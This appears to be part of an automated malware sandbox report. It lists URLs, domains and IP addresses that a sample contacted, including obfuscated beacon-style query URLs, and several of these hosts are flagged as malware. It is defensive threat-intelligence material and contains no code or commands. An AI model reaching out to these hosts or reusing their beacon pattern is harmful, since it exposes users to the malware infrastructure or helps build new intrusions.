https://www.loopia.com/support?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parking	1%	Virustotal		Browse
https://parking.reg.ru/script/get_domain_data?domain_name=www.helpers-lion.online&rand=	0%	Avira URL Cloud	safe
https://www.domaintechnik.at/fileadmin/gfx/logos/hostedsoft/get_simple_logo_klein.png	0%	Avira URL Cloud	safe
https://www.reg.ru/domain/new/?utm_source=www.helpers-lion.online&utm_medium=parking&utm_campaign=s_	0%	Virustotal		Browse
http://www.domaintechnik.at/data/gfx/dt_logo_parking.png	0%	Virustotal		Browse
http://www.xn--fhq1c541j0zr.com/rm91/?f6Gp=VzB4OR5&_Z1XhZu=jSd7r+67+N1qAQkxX/tAwzcZagSYI1kZQchR8WhIexhCyQiFJMwmzlR6zVHzfOVMvsfcwBywDpFhuhrgfB+WH/0swiWusA81psiewdkdfDrQ0sPpSZKio/bNAkJ8aUrwxHfI1oA=	0%	Avira URL Cloud	safe
https://static.loopia.se/shared/logo/logo-loopia-white.svg	0%	Avira URL Cloud	safe
https://www.loopia.com/login?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingwe	0%	Avira URL Cloud	safe
http://www.sandranoll.com/aroo/?f6Gp=VzB4OR5&_Z1XhZu=bKy7FSIHmKYFjPoPKsunUN9vBLYaDX52twFEynhtde+XdOqoRjh1sl1n+ba+sSXyFBuEELqLWRHnTW9JDkHGG3kGwJkz3gG7EkbGSmwaxQucCWgWcruhZkgDOmNZxE+MWhMf5t0=	100%	Avira URL Cloud	malware
https://www.domaintechnik.at/fileadmin/gfx/logos/hostedsoft/get_simple_logo_klein.png	0%	Virustotal		Browse
https://www.loopia.com/order/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingw	0%	Avira URL Cloud	safe
http://www.anuts.top/li0t/?f6Gp=VzB4OR5&_Z1XhZu=cVY/NretpRV3pSqbAwFMzZODfIM0+2Z9S8puWnY234sUXEzh+T0fGizPv/1GJq+MSLyulFxDkLwqIofvrKUfmgzsT+t0YhwbvSsCvQsvRzAE2jG1Yfj5GMuV7i/imjBO2IoEoB4=	0%	Avira URL Cloud	safe
https://parking.reg.ru/script/get_domain_data?domain_name=www.helpers-lion.online&rand=	0%	Virustotal		Browse
https://www.hprlz.cz/w6qg/?f6Gp=VzB4OR5&_Z1XhZu=0lpTRQcDUH	0%	Avira URL Cloud	safe
https://www.loopia.com/wordpress/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=park	0%	Avira URL Cloud	safe
https://www.loopia.com/order/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingw	1%	Virustotal		Browse
https://www.domaintechnik.at/fileadmin/gfx/logos/hostedsoft/moodle.png	0%	Avira URL Cloud	safe
https://static.loopia.se/shared/logo/logo-loopia-white.svg	0%	Virustotal		Browse
http://www.dmtxwuatbz.cc/lfkn/	0%	Avira URL Cloud	safe
http://www.helpers-lion.online/mooq/?f6Gp=VzB4OR5&_Z1XhZu=6C5pq03gIUcCxycao4jVOd5j2ETtSk+CIQvh/K6jTje/eWOGI1u26kAEsQXtCs3elXAZegkYPdXqLAdc1WNGmsErbGh+kSxw/T3vF3DtlH4gUPM1PULOdKyAjMPLmXyfHmQWdLU=	0%	Avira URL Cloud	safe
https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css	0%	Avira URL Cloud	safe
http://www.sandranoll.com/aroo/	100%	Avira URL Cloud	malware
https://static.loopia.se/shared/images/additional-pages-hero-shape.webp	0%	Avira URL Cloud	safe
https://www.domaintechnik.at/fileadmin/gfx/logos/hostedsoft/moodle.png	0%	Virustotal		Browse
https://static.loopia.se/shared/style/2022-extra-pages.css	0%	Avira URL Cloud	safe
http://www.gipsytroya.com/tf44/	0%	Avira URL Cloud	safe
http://www.xn--matfrmn-jxa4m.se/4hda/	100%	Avira URL Cloud	malware
https://www.loopia.com/wordpress/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=park	0%	Virustotal		Browse
https://static.loopia.se/shared/style/2022-extra-pages.css	0%	Virustotal		Browse
https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css	0%	Virustotal		Browse
https://static.loopia.se/responsive/images/iOS-114.png	0%	Avira URL Cloud	safe
https://www.loopia.com/login?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingwe	1%	Virustotal		Browse
https://static.loopia.se/shared/images/additional-pages-hero-shape.webp	0%	Virustotal		Browse
http://www.hprlz.cz/w6qg/?f6Gp=VzB4OR5&_Z1XhZu=0lpTRQcDUH+iEsGzFrKDlEkxf0hSGbqe7Z/xuNmTgdli9rpOUGyXizj5cQ9XxC4so84FNpFR9txXxm0tq1CazipzNNgDDIAUjfELp6jBD7CSuTSqHiapwIkFoNbxbnWBWfXwpxA=	0%	Avira URL Cloud	safe
http://www.dmtxwuatbz.cc/lfkn/?_Z1XhZu=gu3cG9GLpLv0C38agzY8Nc5HI9FnWTYycVQhN1coGdiN+H1mAKnEyno+ahRh93ZPWIJTdN+wkaWXNdzclzMT/Cuco6m6gy32+9+fxoWaIs9y0g2xUERgGBbxDKDcI36aN6mbjHo=&f6Gp=VzB4OR5	0%	Avira URL Cloud	safe
https://www.hprlz.cz/w6qg/?f6Gp=VzB4OR5&_Z1XhZu=0lpTRQcDUH	0%	Avira URL Cloud	safe
http://www.xn--matfrmn-jxa4m.se/4hda/	0%	Virustotal		Browse
https://www.networksolutions.com/	0%	Avira URL Cloud	safe
https://static.loopia.se/responsive/images/iOS-114.png	0%	Virustotal		Browse
http://www.telwisey.info/ei85/	0%	Avira URL Cloud	safe
https://www.loopia.com/loopiadns/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=park	0%	Avira URL Cloud	safe
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	0%	Avira URL Cloud	safe
http://www.telwisey.info/ei85/	2%	Virustotal		Browse
https://www.domaintechnik.at/fileadmin/pics/logos/icann.gif	0%	Avira URL Cloud	safe
https://www.reg.ru/hosting/?utm_source=www.helpers-lion.online&utm_medium=parking&utm_campaign=s_lan	0%	Avira URL Cloud	safe
https://www.networksolutions.com/	0%	Virustotal		Browse
http://whois.loopia.com/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb&ut	0%	Avira URL Cloud	safe
https://help.reg.ru/support/ssl-sertifikaty/1-etap-zakaz-ssl-sertifikata/kak-zakazat-besplatnyy-ssl-	0%	Avira URL Cloud	safe
http://www.catherineviskadi.com/qe66/?_Z1XhZu=dnvLceXALBk3Hr4/PEp98EYmblYqw8i+NG0MGchlNc+FfqCdFLzpUNQMmrv30qtrBi93uCjMcFA24SebHgOv+wKPhcHxQ8Rf4DwBflmJ1M/5T4ZVijf5rQCTFvH5w/RX8EiUu+U=&f6Gp=VzB4OR5	0%	Avira URL Cloud	safe
https://assets.web.com/legal/English/MSA/v1.0.0.3/ServicesAgreement.pdf	0%	Avira URL Cloud	safe
https://static.loopia.se/responsive/styles/reset.css	0%	Avira URL Cloud	safe
https://www.reg.ru/web-sites/?utm_source=www.helpers-lion.online&utm_medium=parking&utm_campaign=s_l	0%	Avira URL Cloud	safe
https://static.loopia.se/responsive/images/iOS-57.png	0%	Avira URL Cloud	safe
http://www.bfiworkerscomp.com/xzzi/?f6Gp=VzB4OR5&_Z1XhZu=9CTSfwlM5YWl8fva1LSaXKM8r2QUgbHW1FpC9VokAvwkUHOJycf2DDxLp9tWLELwEKEPfCC2oiLqmqE9jQi/T7lrCl4emV2JC4YHgME2JKEwuO5dogcNSV3iaYHGGhbnU2ZhAGg=	0%	Avira URL Cloud	safe
https://cdnjs.cloudflare.com/ajax/libs/gsap/3.1.1/gsap.min.js	0%	Avira URL Cloud	safe
http://www.telwisey.info/ei85/?_Z1XhZu=ORmqfURBt40sHMHN3K9lcqnOZkw5OMnI9iieY9Aomdlbsbne+w1Kch9DF1irZ5FVSFO0rJB3/OJZWwrRbdUXmR9pLGqH3EvMjHhfUWkhMRoKhXKvOJM+sAfODt1eiuBVWJfBsEk=&f6Gp=VzB4OR5	0%	Avira URL Cloud	safe
http://www.catherineviskadi.com/qe66/	0%	Avira URL Cloud	safe
https://www.loopia.com/sitebuilder/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=pa	0%	Avira URL Cloud	safe
https://www.reg.ru/dedicated/?utm_source=www.helpers-lion.online&utm_medium=parking&utm_campaign=s_l	0%	Avira URL Cloud	safe
https://www.loopia.com/domainnames/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=pa	0%	Avira URL Cloud	safe
http://www.dmtxwuatbz.cc	0%	Avira URL Cloud	safe
http://www.anuts.top/li0t/	0%	Avira URL Cloud	safe
https://www.loopia.com/hosting/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkin	0%	Avira URL Cloud	safe
http://www.helpers-lion.online/mooq/	0%	Avira URL Cloud	safe
https://www.domaintechnik.at/fileadmin/gfx/icons/cp/64x64/stats.png	0%	Avira URL Cloud	safe
https://www.loopia.com/woocommerce/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=pa	0%	Avira URL Cloud	safe
https://www.loopia.se?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
www.sandranoll.com	213.145.228.16	true	false	11%, Virustotal, Browse	unknown
www.dmtxwuatbz.cc	172.67.210.102	true	false	2%, Virustotal, Browse	unknown
www.xn--matfrmn-jxa4m.se	194.9.94.85	true	false	0%, Virustotal, Browse	unknown
www.catherineviskadi.com	217.160.0.106	true	false	1%, Virustotal, Browse	unknown
www.anuts.top	23.251.54.212	true	false	10%, Virustotal, Browse	unknown
www.helpers-lion.online	194.58.112.174	true	false	0%, Virustotal, Browse	unknown
www.bfiworkerscomp.com	208.91.197.27	true	false	0%, Virustotal, Browse	unknown
parkingpage.namecheap.com	91.195.240.19	true	false	0%, Virustotal, Browse	unknown
www.telwisey.info	199.192.19.19	true	false	2%, Virustotal, Browse	unknown
www.hprlz.cz	5.44.111.162	true	false	1%, Virustotal, Browse	unknown
www.xn--fhq1c541j0zr.com	43.252.167.188	true	false	0%, Virustotal, Browse	unknown
www.fourgrouw.cfd	unknown	unknown	true		unknown
www.hatercoin.online	unknown	unknown	true	2%, Virustotal, Browse	unknown
www.tinmapco.com	unknown	unknown	true		unknown
www.gipsytroya.com	unknown	unknown	true	1%, Virustotal, Browse	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://www.xn--fhq1c541j0zr.com/rm91/	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://www.bfiworkerscomp.com/xzzi/	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://www.gipsytroya.com/tf44/?_Z1XhZu=zHiAY6EG+HxIxFu8Foth356DlimOdN8M+W8Rr/tGfSzDPDxggLk9FyyADeImH3/ZYgS5WMd+vNhhyXlbnciyxeruC6VSAZ3gbjbhtXBfFULxOBNiYF/KhRcXzdCdYnjqXRzee6k=&f6Gp=VzB4OR5	false	Avira URL Cloud: safe	unknown
http://www.xn--matfrmn-jxa4m.se/4hda/?_Z1XhZu=+FYRabRorC7iiipcHmFJARkvcpdCy5kXHVGGEQvE/CSzp7OmTlR57ws6ggMdmmjgEK74RwiZfuW5KkdpyqG9/cDU9mAi5AO1k3J2CN+QyvLAoTep+eWpcszcsTCcamkkP6oiBRs=&f6Gp=VzB4OR5	false	Avira URL Cloud: malware	unknown
http://www.xn--fhq1c541j0zr.com/rm91/?f6Gp=VzB4OR5&_Z1XhZu=jSd7r+67+N1qAQkxX/tAwzcZagSYI1kZQchR8WhIexhCyQiFJMwmzlR6zVHzfOVMvsfcwBywDpFhuhrgfB+WH/0swiWusA81psiewdkdfDrQ0sPpSZKio/bNAkJ8aUrwxHfI1oA=	false	Avira URL Cloud: safe	unknown
http://www.sandranoll.com/aroo/?f6Gp=VzB4OR5&_Z1XhZu=bKy7FSIHmKYFjPoPKsunUN9vBLYaDX52twFEynhtde+XdOqoRjh1sl1n+ba+sSXyFBuEELqLWRHnTW9JDkHGG3kGwJkz3gG7EkbGSmwaxQucCWgWcruhZkgDOmNZxE+MWhMf5t0=	true	Avira URL Cloud: malware	unknown
http://www.anuts.top/li0t/?f6Gp=VzB4OR5&_Z1XhZu=cVY/NretpRV3pSqbAwFMzZODfIM0+2Z9S8puWnY234sUXEzh+T0fGizPv/1GJq+MSLyulFxDkLwqIofvrKUfmgzsT+t0YhwbvSsCvQsvRzAE2jG1Yfj5GMuV7i/imjBO2IoEoB4=	false	Avira URL Cloud: safe	unknown
http://www.dmtxwuatbz.cc/lfkn/	false	Avira URL Cloud: safe	unknown
http://www.helpers-lion.online/mooq/?f6Gp=VzB4OR5&_Z1XhZu=6C5pq03gIUcCxycao4jVOd5j2ETtSk+CIQvh/K6jTje/eWOGI1u26kAEsQXtCs3elXAZegkYPdXqLAdc1WNGmsErbGh+kSxw/T3vF3DtlH4gUPM1PULOdKyAjMPLmXyfHmQWdLU=	false	Avira URL Cloud: safe	unknown
http://www.sandranoll.com/aroo/	true	Avira URL Cloud: malware	unknown
http://www.gipsytroya.com/tf44/	false	Avira URL Cloud: safe	unknown
http://www.xn--matfrmn-jxa4m.se/4hda/	false	0%, Virustotal, Browse Avira URL Cloud: malware	unknown
http://www.hprlz.cz/w6qg/?f6Gp=VzB4OR5&_Z1XhZu=0lpTRQcDUH+iEsGzFrKDlEkxf0hSGbqe7Z/xuNmTgdli9rpOUGyXizj5cQ9XxC4so84FNpFR9txXxm0tq1CazipzNNgDDIAUjfELp6jBD7CSuTSqHiapwIkFoNbxbnWBWfXwpxA=	false	Avira URL Cloud: safe	unknown
http://www.dmtxwuatbz.cc/lfkn/?_Z1XhZu=gu3cG9GLpLv0C38agzY8Nc5HI9FnWTYycVQhN1coGdiN+H1mAKnEyno+ahRh93ZPWIJTdN+wkaWXNdzclzMT/Cuco6m6gy32+9+fxoWaIs9y0g2xUERgGBbxDKDcI36aN6mbjHo=&f6Gp=VzB4OR5	false	Avira URL Cloud: safe	unknown
http://www.telwisey.info/ei85/	false	2%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://www.catherineviskadi.com/qe66/?_Z1XhZu=dnvLceXALBk3Hr4/PEp98EYmblYqw8i+NG0MGchlNc+FfqCdFLzpUNQMmrv30qtrBi93uCjMcFA24SebHgOv+wKPhcHxQ8Rf4DwBflmJ1M/5T4ZVijf5rQCTFvH5w/RX8EiUu+U=&f6Gp=VzB4OR5	false	Avira URL Cloud: safe	unknown
http://www.bfiworkerscomp.com/xzzi/?f6Gp=VzB4OR5&_Z1XhZu=9CTSfwlM5YWl8fva1LSaXKM8r2QUgbHW1FpC9VokAvwkUHOJycf2DDxLp9tWLELwEKEPfCC2oiLqmqE9jQi/T7lrCl4emV2JC4YHgME2JKEwuO5dogcNSV3iaYHGGhbnU2ZhAGg=	false	Avira URL Cloud: safe	unknown
http://www.telwisey.info/ei85/?_Z1XhZu=ORmqfURBt40sHMHN3K9lcqnOZkw5OMnI9iieY9Aomdlbsbne+w1Kch9DF1irZ5FVSFO0rJB3/OJZWwrRbdUXmR9pLGqH3EvMjHhfUWkhMRoKhXKvOJM+sAfODt1eiuBVWJfBsEk=&f6Gp=VzB4OR5	false	Avira URL Cloud: safe	unknown
http://www.catherineviskadi.com/qe66/	false	Avira URL Cloud: safe	unknown
http://www.anuts.top/li0t/	false	Avira URL Cloud: safe	unknown
http://www.helpers-lion.online/mooq/	false	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://duckduckgo.com/chrome_newtab	clip.exe, 00000004.00000002.4610235911.0000000007A7E000.00000004.00000020.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://www.reg.ru/whois/?check=&dname=www.helpers-lion.online&reg_source=parking_auto	clip.exe, 00000004.00000002.4608397493.00000000065BC000.00000004.10000000.00040000.00000000.sdmp, WsLcnyccsDHmlxczMuydOvvxEH.exe, 00000008.00000002.4607187939.000000000497C000.00000004.00000001.00040000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://dts.gnpge.com	WsLcnyccsDHmlxczMuydOvvxEH.exe, 00000008.00000002.4607187939.0000000003CEC000.00000004.00000001.00040000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://duckduckgo.com/ac/?q=	clip.exe, 00000004.00000002.4610235911.0000000007A7E000.00000004.00000020.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://reg.ru	clip.exe, 00000004.00000002.4608397493.00000000065BC000.00000004.10000000.00040000.00000000.sdmp, WsLcnyccsDHmlxczMuydOvvxEH.exe, 00000008.00000002.4607187939.000000000497C000.00000004.00000001.00040000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://customerservice.web.com/prweb/PRAuth/app/WebKM_/JfLhd8LVz0a16-h3GqsHOCqqFky5N_vd	clip.exe, 00000004.00000002.4608397493.000000000592C000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000004.00000002.4610146783.00000000077D0000.00000004.00000800.00020000.00000000.sdmp, WsLcnyccsDHmlxczMuydOvvxEH.exe, 00000008.00000002.4607187939.0000000003CEC000.00000004.00000001.00040000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://cdnjs.cloudflare.com/ajax/libs/twitter-bootstrap/4.1.3/css/bootstrap.min.css	clip.exe, 00000004.00000002.4608397493.0000000006106000.00000004.10000000.00040000.00000000.sdmp, WsLcnyccsDHmlxczMuydOvvxEH.exe, 00000008.00000002.4607187939.00000000044C6000.00000004.00000001.00040000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://www.reg.ru/web-sites/website-builder/?utm_source=www.helpers-lion.online&utm_medium=parking&	clip.exe, 00000004.00000002.4608397493.00000000065BC000.00000004.10000000.00040000.00000000.sdmp, WsLcnyccsDHmlxczMuydOvvxEH.exe, 00000008.00000002.4607187939.000000000497C000.00000004.00000001.00040000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	clip.exe, 00000004.00000002.4610235911.0000000007A7E000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://static.loopia.se/responsive/images/iOS-72.png	clip.exe, 00000004.00000002.4608397493.0000000005DE2000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000004.00000002.4610146783.00000000077D0000.00000004.00000800.00020000.00000000.sdmp, WsLcnyccsDHmlxczMuydOvvxEH.exe, 00000008.00000002.4607187939.00000000041A2000.00000004.00000001.00040000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://www.loopia.com/support?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parking	clip.exe, 00000004.00000002.4608397493.0000000005DE2000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000004.00000002.4610146783.00000000077D0000.00000004.00000800.00020000.00000000.sdmp, WsLcnyccsDHmlxczMuydOvvxEH.exe, 00000008.00000002.4607187939.00000000041A2000.00000004.00000001.00040000.00000000.sdmp	false	1%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://www.domaintechnik.at/data/gfx/dt_logo_parking.png	clip.exe, 00000004.00000002.4608397493.0000000006298000.00000004.10000000.00040000.00000000.sdmp, WsLcnyccsDHmlxczMuydOvvxEH.exe, 00000008.00000002.4607187939.0000000004658000.00000004.00000001.00040000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://www.reg.ru/domain/new/?utm_source=www.helpers-lion.online&utm_medium=parking&utm_campaign=s_	clip.exe, 00000004.00000002.4608397493.00000000065BC000.00000004.10000000.00040000.00000000.sdmp, WsLcnyccsDHmlxczMuydOvvxEH.exe, 00000008.00000002.4607187939.000000000497C000.00000004.00000001.00040000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://parking.reg.ru/script/get_domain_data?domain_name=www.helpers-lion.online&rand=	clip.exe, 00000004.00000002.4608397493.00000000065BC000.00000004.10000000.00040000.00000000.sdmp, WsLcnyccsDHmlxczMuydOvvxEH.exe, 00000008.00000002.4607187939.000000000497C000.00000004.00000001.00040000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://www.domaintechnik.at/fileadmin/gfx/logos/hostedsoft/get_simple_logo_klein.png	clip.exe, 00000004.00000002.4608397493.0000000006298000.00000004.10000000.00040000.00000000.sdmp, WsLcnyccsDHmlxczMuydOvvxEH.exe, 00000008.00000002.4607187939.0000000004658000.00000004.00000001.00040000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://static.loopia.se/shared/logo/logo-loopia-white.svg	clip.exe, 00000004.00000002.4608397493.0000000005DE2000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000004.00000002.4610146783.00000000077D0000.00000004.00000800.00020000.00000000.sdmp, WsLcnyccsDHmlxczMuydOvvxEH.exe, 00000008.00000002.4607187939.00000000041A2000.00000004.00000001.00040000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://www.loopia.com/login?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingwe	clip.exe, 00000004.00000002.4608397493.0000000005DE2000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000004.00000002.4610146783.00000000077D0000.00000004.00000800.00020000.00000000.sdmp, WsLcnyccsDHmlxczMuydOvvxEH.exe, 00000008.00000002.4607187939.00000000041A2000.00000004.00000001.00040000.00000000.sdmp	false	1%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://www.loopia.com/order/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingw	clip.exe, 00000004.00000002.4608397493.0000000005DE2000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000004.00000002.4610146783.00000000077D0000.00000004.00000800.00020000.00000000.sdmp, WsLcnyccsDHmlxczMuydOvvxEH.exe, 00000008.00000002.4607187939.00000000041A2000.00000004.00000001.00040000.00000000.sdmp	false	1%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://www.hprlz.cz/w6qg/?f6Gp=VzB4OR5&_Z1XhZu=0lpTRQcDUH	clip.exe, 00000004.00000002.4608397493.00000000052E4000.00000004.10000000.00040000.00000000.sdmp, WsLcnyccsDHmlxczMuydOvvxEH.exe, 00000008.00000002.4607187939.00000000036A4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000A.00000002.2621909340.0000000006B64000.00000004.80000000.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	clip.exe, 00000004.00000002.4610235911.0000000007A7E000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.loopia.com/wordpress/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=park	clip.exe, 00000004.00000002.4608397493.0000000005DE2000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000004.00000002.4610146783.00000000077D0000.00000004.00000800.00020000.00000000.sdmp, WsLcnyccsDHmlxczMuydOvvxEH.exe, 00000008.00000002.4607187939.00000000041A2000.00000004.00000001.00040000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://www.domaintechnik.at/fileadmin/gfx/logos/hostedsoft/moodle.png	clip.exe, 00000004.00000002.4608397493.0000000006298000.00000004.10000000.00040000.00000000.sdmp, WsLcnyccsDHmlxczMuydOvvxEH.exe, 00000008.00000002.4607187939.0000000004658000.00000004.00000001.00040000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css	clip.exe, 00000004.00000002.4608397493.0000000006106000.00000004.10000000.00040000.00000000.sdmp, WsLcnyccsDHmlxczMuydOvvxEH.exe, 00000008.00000002.4607187939.00000000044C6000.00000004.00000001.00040000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://static.loopia.se/shared/images/additional-pages-hero-shape.webp	clip.exe, 00000004.00000002.4608397493.0000000005DE2000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000004.00000002.4610146783.00000000077D0000.00000004.00000800.00020000.00000000.sdmp, WsLcnyccsDHmlxczMuydOvvxEH.exe, 00000008.00000002.4607187939.00000000041A2000.00000004.00000001.00040000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://static.loopia.se/shared/style/2022-extra-pages.css	clip.exe, 00000004.00000002.4608397493.0000000005DE2000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000004.00000002.4610146783.00000000077D0000.00000004.00000800.00020000.00000000.sdmp, WsLcnyccsDHmlxczMuydOvvxEH.exe, 00000008.00000002.4607187939.00000000041A2000.00000004.00000001.00040000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://static.loopia.se/responsive/images/iOS-114.png	clip.exe, 00000004.00000002.4608397493.0000000005DE2000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000004.00000002.4610146783.00000000077D0000.00000004.00000800.00020000.00000000.sdmp, WsLcnyccsDHmlxczMuydOvvxEH.exe, 00000008.00000002.4607187939.00000000041A2000.00000004.00000001.00040000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://www.hprlz.cz/w6qg/?f6Gp=VzB4OR5&_Z1XhZu=0lpTRQcDUH	clip.exe, 00000004.00000002.4608397493.00000000052E4000.00000004.10000000.00040000.00000000.sdmp, WsLcnyccsDHmlxczMuydOvvxEH.exe, 00000008.00000002.4607187939.00000000036A4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000A.00000002.2621909340.0000000006B64000.00000004.80000000.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.networksolutions.com/	clip.exe, 00000004.00000002.4608397493.000000000592C000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000004.00000002.4610146783.00000000077D0000.00000004.00000800.00020000.00000000.sdmp, WsLcnyccsDHmlxczMuydOvvxEH.exe, 00000008.00000002.4607187939.0000000003CEC000.00000004.00000001.00040000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://www.loopia.com/loopiadns/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=park	clip.exe, 00000004.00000002.4608397493.0000000005DE2000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000004.00000002.4610146783.00000000077D0000.00000004.00000800.00020000.00000000.sdmp, WsLcnyccsDHmlxczMuydOvvxEH.exe, 00000008.00000002.4607187939.00000000041A2000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	clip.exe, 00000004.00000002.4610235911.0000000007A7E000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.domaintechnik.at/fileadmin/pics/logos/icann.gif	clip.exe, 00000004.00000002.4608397493.0000000006298000.00000004.10000000.00040000.00000000.sdmp, WsLcnyccsDHmlxczMuydOvvxEH.exe, 00000008.00000002.4607187939.0000000004658000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.reg.ru/hosting/?utm_source=www.helpers-lion.online&utm_medium=parking&utm_campaign=s_lan	clip.exe, 00000004.00000002.4608397493.00000000065BC000.00000004.10000000.00040000.00000000.sdmp, WsLcnyccsDHmlxczMuydOvvxEH.exe, 00000008.00000002.4607187939.000000000497C000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://whois.loopia.com/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb&ut	clip.exe, 00000004.00000002.4608397493.0000000005DE2000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000004.00000002.4610146783.00000000077D0000.00000004.00000800.00020000.00000000.sdmp, WsLcnyccsDHmlxczMuydOvvxEH.exe, 00000008.00000002.4607187939.00000000041A2000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://help.reg.ru/support/ssl-sertifikaty/1-etap-zakaz-ssl-sertifikata/kak-zakazat-besplatnyy-ssl-	clip.exe, 00000004.00000002.4608397493.00000000065BC000.00000004.10000000.00040000.00000000.sdmp, WsLcnyccsDHmlxczMuydOvvxEH.exe, 00000008.00000002.4607187939.000000000497C000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.ecosia.org/newtab/	clip.exe, 00000004.00000002.4610235911.0000000007A7E000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://assets.web.com/legal/English/MSA/v1.0.0.3/ServicesAgreement.pdf	clip.exe, 00000004.00000002.4608397493.000000000592C000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000004.00000002.4610146783.00000000077D0000.00000004.00000800.00020000.00000000.sdmp, WsLcnyccsDHmlxczMuydOvvxEH.exe, 00000008.00000002.4607187939.0000000003CEC000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
